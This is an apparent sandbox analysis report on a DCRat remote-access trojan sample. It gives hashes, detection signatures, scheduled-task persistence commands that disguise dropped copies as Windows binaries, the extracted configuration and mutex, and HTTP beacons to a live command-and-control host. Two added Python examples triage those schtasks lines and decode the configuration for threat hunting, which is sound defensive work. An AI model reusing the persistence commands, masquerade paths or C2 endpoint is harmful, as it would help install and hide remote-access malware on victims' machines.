
Windows Analysis Report
oFAjWuoHBq.exe

Overview

General Information

Sample name: oFAjWuoHBq.exe (renamed because the original name is a hash value)
Original sample name: 97177514cab51539083ef130f005bbd1.exe
Analysis ID: 1581832
MD5: 97177514cab51539083ef130f005bbd1
SHA1: 49e2661ee3e8f6fd6b06334b00543590ed8fe208
SHA256: 500a74281de1bc8e6eb4e08eb8705235f4436ccb209ecaca91fe4ad43a869015
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • oFAjWuoHBq.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\oFAjWuoHBq.exe" MD5: 97177514CAB51539083EF130F005BBD1)
    • schtasks.exe (PID: 6516 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7152 cmdline: schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6128 cmdline: schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5268 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6472 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5764 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5436 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2272 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5036 cmdline: schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1220 cmdline: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1120 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6628 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1472 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • ctfmon.exe (PID: 7152 cmdline: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe" MD5: 97177514CAB51539083EF130F005BBD1)
  • ctfmon.exe (PID: 6128 cmdline: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe" MD5: 97177514CAB51539083EF130F005BBD1)
  • Registry.exe (PID: 5612 cmdline: C:\Users\Public\AccountPictures\Registry.exe MD5: 97177514CAB51539083EF130F005BBD1)
  • Registry.exe (PID: 6544 cmdline: C:\Users\Public\AccountPictures\Registry.exe MD5: 97177514CAB51539083EF130F005BBD1)
  • cleanup
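The process tree above is dominated by fifteen schtasks.exe invocations that register the dropped copies (ctfmon.exe, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, Registry.exe, StartMenuExperienceHost.exe) as ONLOGON tasks plus MINUTE tasks with 7 to 14 minute intervals, most of them with /rl HIGHEST. The following is an added example, not part of the Joe Sandbox report, showing how a triage script would pull those traits out of raw `schtasks /create` command lines. The sample lines are copied from the tree; the final "NightlyBackup" line is a constructed benign control. The table of where Windows ships ctfmon.exe (System32) and StartMenuExperienceHost.exe (SystemApps) is an assumption of the example, as is the choice of thresholds; "Registry.exe" is not a file on a stock Windows install, so it is caught by the location checks rather than the masquerade table.

```python
import re
from pathlib import PureWindowsPath

# Where Windows ships these binaries (assumed for this example). A task action
# that uses the same file name anywhere else is treated as a masquerade.
KNOWN_WINDOWS_BINARIES = {
    "ctfmon.exe": r"C:\Windows\System32",
    "startmenuexperiencehost.exe": r"C:\Windows\SystemApps",
}

# Constructed sample: four command lines from the process tree above plus one
# benign control line (the last one, not from the report).
SAMPLE_CMDLINES = [
    r"""schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f""",
    r"""schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f""",
    r"""schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /rl HIGHEST /f""",
    r"""schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Acme Backup\backup.exe" /f""",
]


def parse_schtasks(cmdline):
    """Map /flag -> value for a schtasks command line.

    Tokens split on whitespace, but a double-quoted argument stays one token,
    which is how schtasks itself receives it. Flags without a value (/f) map to
    True. Surrounding double and single quotes are stripped from values.
    """
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    args = {}
    i = 1  # tokens[0] is the program name
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            if nxt is not None and not nxt.startswith("/"):
                args[key] = nxt.strip('"').strip("'")
                i += 2
                continue
            args[key] = True
        i += 1
    return args


def assess(cmdline):
    """Return the reasons a `schtasks /create` line looks like persistence abuse."""
    args = parse_schtasks(cmdline)
    if "create" not in args or "tr" not in args:
        return []
    action = args["tr"]
    m = re.match(r"(.*?\.exe)\b", action, re.IGNORECASE)  # drop any arguments
    p = PureWindowsPath(m.group(1) if m else action)
    name = p.name.lower()
    parts = [s.lower() for s in p.parts]
    reasons = []

    expected = KNOWN_WINDOWS_BINARIES.get(name)
    if expected and not str(p.parent).lower().startswith(expected.lower()):
        reasons.append(f"masquerade: {p.name} outside {expected}")

    # Executables placed in world-writable or profile-root locations.
    if len(parts) >= 3 and parts[1] == "users":
        if parts[2] == "public":
            reasons.append("action under C:\\Users\\Public")
        elif len(parts) == 4:
            reasons.append("action directly in a user profile root")

    # Task name equal to the binary name or one character longer
    # (ctfmon / ctfmonc, Registry / RegistryR in the tree above).
    stem = p.stem.lower()
    tn = str(args.get("tn", "")).lower()
    if tn and tn.startswith(stem) and len(tn) - len(stem) <= 1:
        reasons.append("task name derived from binary name")

    if str(args.get("sc", "")).upper() == "MINUTE":
        try:
            every = int(args.get("mo", 1))
        except ValueError:
            every = 1
        if every <= 15:  # threshold assumed for this example
            reasons.append(f"re-launch every {every} min")
    if str(args.get("rl", "")).upper() == "HIGHEST":
        reasons.append("runs with highest privileges")
    return reasons


def triage(cmdlines):
    """Return (cmdline, reasons) for every line that raised at least one reason."""
    return [(c, assess(c)) for c in cmdlines if assess(c)]


if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_CMDLINES):
        print(cmd)
        for r in reasons:
            print("   -", r)
```

Fed with process-creation events from an EDR or Sysmon Event ID 1, the same `assess` function gives one hit per schtasks call; the combination "derived task name + short MINUTE interval + HIGHEST" is what distinguishes this DCRat installer from an administrator's scheduled job.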

Malware Configuration

{"SCRT": "{\"A\":\"-\",\"G\":\"%\",\"9\":\"<\",\"d\":\"&\",\"C\":\"#\",\"k\":\"$\",\"F\":\")\",\"V\":\"*\",\"L\":\"^\",\"e\":\"(\",\"i\":\"@\",\"o\":\"`\",\"H\":\"_\",\"W\":\".\",\"6\":\">\",\"I\":\" \",\"5\":\"|\",\"N\":\"~\",\"m\":\";\",\"J\":\",\",\"Z\":\"!\"}", "PCRT": "{\"U\":\";\",\"L\":\"%\",\"Q\":\".\",\"c\":\">\",\"Z\":\"_\",\"1\":\"(\",\"F\":\"`\",\"S\":\"!\",\"H\":\"$\",\"N\":\"@\",\"v\":\"|\",\"y\":\" \",\"R\":\",\",\"Y\":\"&\",\"3\":\"-\",\"G\":\"<\",\"B\":\"#\",\"W\":\"~\",\"2\":\")\",\"n\":\"^\",\"C\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
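The extracted configuration is JSON whose SCRT and PCRT members are themselves JSON objects serialized into strings, so a naive single `json.loads` leaves them as text. The following is an added example, not code from the report or from DCRat, that unwraps the blob, pulls out the values worth hunting on (the mutex name and the file-search path) and turns the two character tables into forward and inverse maps. The report does not say how the sample applies SCRT and PCRT; treating them as single-character substitution alphabets, and requiring them to be bijective before building an inverse, is an assumption of the example. One thing the data does show, and the code checks, is that both tables map their 21 keys onto the same 21 punctuation symbols.

```python
import json

# The configuration blob from the report above, embedded verbatim.
RAW_CONFIG = r'''{"SCRT": "{\"A\":\"-\",\"G\":\"%\",\"9\":\"<\",\"d\":\"&\",\"C\":\"#\",\"k\":\"$\",\"F\":\")\",\"V\":\"*\",\"L\":\"^\",\"e\":\"(\",\"i\":\"@\",\"o\":\"`\",\"H\":\"_\",\"W\":\".\",\"6\":\">\",\"I\":\" \",\"5\":\"|\",\"N\":\"~\",\"m\":\";\",\"J\":\",\",\"Z\":\"!\"}", "PCRT": "{\"U\":\";\",\"L\":\"%\",\"Q\":\".\",\"c\":\">\",\"Z\":\"_\",\"1\":\"(\",\"F\":\"`\",\"S\":\"!\",\"H\":\"$\",\"N\":\"@\",\"v\":\"|\",\"y\":\" \",\"R\":\",\",\"Y\":\"&\",\"3\":\"-\",\"G\":\"<\",\"B\":\"#\",\"W\":\"~\",\"2\":\")\",\"n\":\"^\",\"C\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}'''


def load_config(raw):
    """Parse the extractor output, decoding any object that arrived as a string.

    SCRT and PCRT are JSON text inside JSON strings and need a second
    json.loads before they can be used as dictionaries; other string values
    (TAG, MUTEX) are left alone.
    """
    cfg = json.loads(raw)
    for key, value in list(cfg.items()):
        if isinstance(value, str) and value.startswith("{"):
            try:
                cfg[key] = json.loads(value)
            except json.JSONDecodeError:
                pass
    return cfg


def substitution_tables(cfg):
    """Return {name: (forward, inverse)} for every single-character map in cfg.

    The inverse is only meaningful if the table is a bijection; a repeated
    target symbol would make decoding ambiguous, so that case raises instead
    of silently returning a lossy map. (Assumed semantics, see lead-in.)
    """
    tables = {}
    for name, value in cfg.items():
        is_char_map = (
            isinstance(value, dict) and value
            and all(len(k) == 1 and isinstance(v, str) and len(v) == 1
                    for k, v in value.items())
        )
        if not is_char_map:
            continue
        if len(set(value.values())) != len(value):
            raise ValueError(f"{name}: target symbols are not unique")
        tables[name] = (dict(value), {v: k for k, v in value.items()})
    return tables


def apply_table(text, table):
    """Substitute every character of `text` that has an entry in `table`."""
    return "".join(table.get(ch, ch) for ch in text)


def hunting_iocs(cfg):
    """Configuration values that translate directly into host hunts."""
    return {
        "mutex": cfg.get("MUTEX"),
        "file_search_path": cfg.get("ASCFG", {}).get("searchpath"),
        "symbol_alphabet": "".join(sorted(set(cfg["SCRT"].values()))),
    }


if __name__ == "__main__":
    cfg = load_config(RAW_CONFIG)
    print(hunting_iocs(cfg))
    fwd, inv = substitution_tables(cfg)["SCRT"]
    print(apply_table("HI", fwd), "->", apply_table(apply_table("HI", fwd), inv))
```

The mutex name is the cheapest host-side check: a process holding `DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb` on any machine in the estate is this build, regardless of which of the five file names it is running under.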
Source | Rule | Description | Author | Strings
00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(21 Yara matches in total; the first five are listed here)

            System Summary

Sigma rule matches (the two rules named in the signature list above):

Source: Process started | Rule: Execution from Suspicious Folder | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\AccountPictures\Registry.exe, CommandLine: C:\Users\Public\AccountPictures\Registry.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\AccountPictures\Registry.exe, NewProcessName: C:\Users\Public\AccountPictures\Registry.exe, OriginalFileName: C:\Users\Public\AccountPictures\Registry.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Public\AccountPictures\Registry.exe, ProcessId: 5612, ProcessName: Registry.exe
Source: Process started | Rule: Suspicious Schtasks From Env Var Folder | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, CommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oFAjWuoHBq.exe", ParentImage: C:\Users\user\Desktop\oFAjWuoHBq.exe, ParentProcessId: 1372, ParentProcessName: oFAjWuoHBq.exe, ProcessCommandLine: schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f, ProcessId: 2272, ProcessName: schtasks.exe

Note the empty ParentImage and ParentCommandLine for Registry.exe (PID 5612, parent PID 1068): the dropped copies are not children of oFAjWuoHBq.exe in the process tree, which is consistent with the "Creates processes via WMI" signature. A parent-child rule keyed on the dropper will therefore miss the second stage; the scheduled tasks and the Public/profile-root image paths are the more reliable hooks.

Suricata IDS alert:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-29T03:37:02.276316+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 5.101.152.15 | 80 | TCP


            AV Detection

Source: oFAjWuoHBq.exe | Avira: detected
Source: http://ilusharx.beget.tech/ | Avira URL Cloud: Label: malware
Source: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs | Avira URL Cloud: Label: malware
Source: http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38 | Avira URL Cloud: Label: malware
Source: http://ilusharx.beget.tech | Avira URL Cloud: Label: malware
Source: C:\Users\Public\AccountPictures\Registry.exe | Avira: detection malicious, Label: HEUR/AGEN.1323944
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Avira: detection malicious, Label: HEUR/AGEN.1323944
Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323944
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Avira: detection malicious, Label: HEUR/AGEN.1323944
Source: C:\Users\user\StartMenuExperienceHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323944
Source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"A\":\"-\",\"G\":\"%\",\"9\":\"<\",\"d\":\"&\",\"C\":\"#\",\"k\":\"$\",\"F\":\")\",\"V\":\"*\",\"L\":\"^\",\"e\":\"(\",\"i\":\"@\",\"o\":\"`\",\"H\":\"_\",\"W\":\".\",\"6\":\">\",\"I\":\" \",\"5\":\"|\",\"N\":\"~\",\"m\":\";\",\"J\":\",\",\"Z\":\"!\"}", "PCRT": "{\"U\":\";\",\"L\":\"%\",\"Q\":\".\",\"c\":\">\",\"Z\":\"_\",\"1\":\"(\",\"F\":\"`\",\"S\":\"!\",\"H\":\"$\",\"N\":\"@\",\"v\":\"|\",\"y\":\" \",\"R\":\",\",\"Y\":\"&\",\"3\":\"-\",\"G\":\"<\",\"B\":\"#\",\"W\":\"~\",\"2\":\")\",\"n\":\"^\",\"C\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-fVK1Lf5pvBKBEfQSvIgb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | ReversingLabs: Detection: 78%
Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | ReversingLabs: Detection: 78%
Source: C:\Users\Public\AccountPictures\Registry.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\StartMenuExperienceHost.exe | ReversingLabs: Detection: 78%
Source: oFAjWuoHBq.exe | ReversingLabs: Detection: 78%
Source: oFAjWuoHBq.exe | Virustotal: Detection: 75%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\AccountPictures\Registry.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Joe Sandbox ML: detected
Source: C:\Users\user\StartMenuExperienceHost.exe | Joe Sandbox ML: detected
Source: oFAjWuoHBq.exe | Joe Sandbox ML: detected
Source: oFAjWuoHBq.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Directory created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Directory created: C:\Program Files\Windows Sidebar\Gadgets\26c12092da979c
Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Directory created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Directory created: C:\Program Files\Mozilla Firefox\fonts\645bc6bab0f65c
Source: oFAjWuoHBq.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll | source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb | source: oFAjWuoHBq.exe, 00000000.00000002.2053492926.000000001B500000.00000004.08000000.00040000.00000000.sdmp, oFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003111000.00000004.00000800.00020000.00000000.sdmp

            Networking

Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 5.101.152.15:80
Source: Joe Sandbox View | ASN Name: BEGET-ASRU BEGET-ASRU
Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: ilusharx.beget.tech | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: ilusharx.beget.tech
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: ilusharx.beget.tech | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: ilusharx.beget.tech
Source: global traffic | DNS traffic detected: DNS query: ilusharx.beget.tech
Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ilusharx.beget.tech
Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003219000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2088975523.00000000137A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ilusharx.beget.tech/
